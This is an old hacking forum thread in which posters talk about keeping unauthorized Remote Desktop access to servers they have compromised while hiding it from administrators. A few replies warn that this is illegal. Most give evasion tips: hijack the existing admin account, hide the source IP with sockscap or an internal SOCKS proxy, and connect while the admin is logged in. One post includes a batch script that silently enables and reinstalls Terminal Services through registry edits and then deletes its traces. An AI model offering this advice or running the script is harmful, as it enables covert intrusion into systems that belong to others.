HI.

Dou you know any way to hide a user so it wont show up in the list of currently connected clients ?

THX Poldi

there was a npother thread on this, first off i dont think it can be done unless you somehow disable Terminal server manager ( i.e. sabotage the program on the server that lets them view connected clients, have a look for linked dll's or something)

2nd off this is a VERY BAD way to gain access to a system if its not yours, im sure others will agree?

3nd off this is a VERY BAD way to gain access to a system if its not yours, im sure others will agree?

sure it been done api hooking code not public but it can be done

i have some servers where i can access via ts since over a year and never had problems so why should this be a bad way this way rocks ?

fine have it your way but you will end up getting BUSTED.

the idea to have full control over a box and not let the admin know obbiously doesnt appeal to you and u want to be known,

Hm i also thought about this.

Up to now i haven't used TS to control a host, also because i don't know how obvious the connection is ...

Where does the admin of the host can see that you are logged on?

You got two problems: First you have to create a user account (best admin) - this account can be found be the admin (won't it even be visible at next windows login screen?)
And second problem, when you connect using TS then i think the admin can also see that you are connected quite easily.

Would be cool if you post some comments.

Greetz
=k3Rn=

Why create your own account, why not just grab their existing admin account?

And, why connect to it with your own IP? I mean come on there are ways to use other IP's when connecting.

And how many admins do you know that sit there and check out who is logged in via TS? Im guessing not many, and if they do see you, it will be accidental I am sure.

But its a risk you take........ but then, accessing any machine illegally is a risk you take....

just be sensible and careful

sockscap > *

Exactly, use sockscap....

And if the admin is logged in to the desktop, you can usually still use an RDP connection to log in unless they have set it as such that you cant.

But most admins dont do that

install socks inside the server, then connect to ts through itself by socks5, what ip will be shown in tsadmin?


127.0.0.1

LOL

Use a Router or Switch on your PC!

Then the Terminal Service Manager on the Hacked Machine will Show your Internal IP (192.168.*.*)

(But the Admin Can still see your real IP with netstat)

Or Uninstall Terminal Services and Reinstall it with this .bat :

----------------------------------------
echo Windows Registry Editor Version 5.00> c:\TS.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]>> c:\TS.reg
echo "Start"=dword:00000002>> c:\TS.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]>>C:\TS.REG
echo "EnableAdminTSRemote"=dword:00000001>>C:\TS.REG
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>C:\TS.REG
echo "TSEnabled"=dword:00000001>>C:\TS.REG
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD]>>C:\TS.REG
echo "Start"=dword:00000002>>C:\TS.REG
REGEDIT /S C:\TS.REG
echo [Components] > c:\bootlog~.txt
echo TSEnabled = on >> c:\bootlog~.txt
sysocmgr /i:%windir%\inf\sysoc.inf /u:c:\bootlog~.txt /q
DEL /Q c:\TS.REG
DEL /Q c:\bootlog~.txt
-----------------------------------------

Then Terminal Services will be Enabled without the Manager

cool the ts installation w/o manager ^^ thx

great suggestions, will certainly use them in the next admin session

about loggin in with the same user... if 2 boxes connect to the same server via ts with the same user i think they can see one the each other's desktop, or not?
i mean... like dntu mini remote ctrl (it isn't a perfect example), u interact with the other one logged in.
am i wrong?
or on ts u can login 10 person with the same user and have 10 different desktops?
sorry for my english if u don't understand i'll try to speak in a easy way

have a nice day, byebye

ok tnx for the info
i'll never stop to learn
bye have a nice day

it can be done as well with windows XP btw ...
just a registry change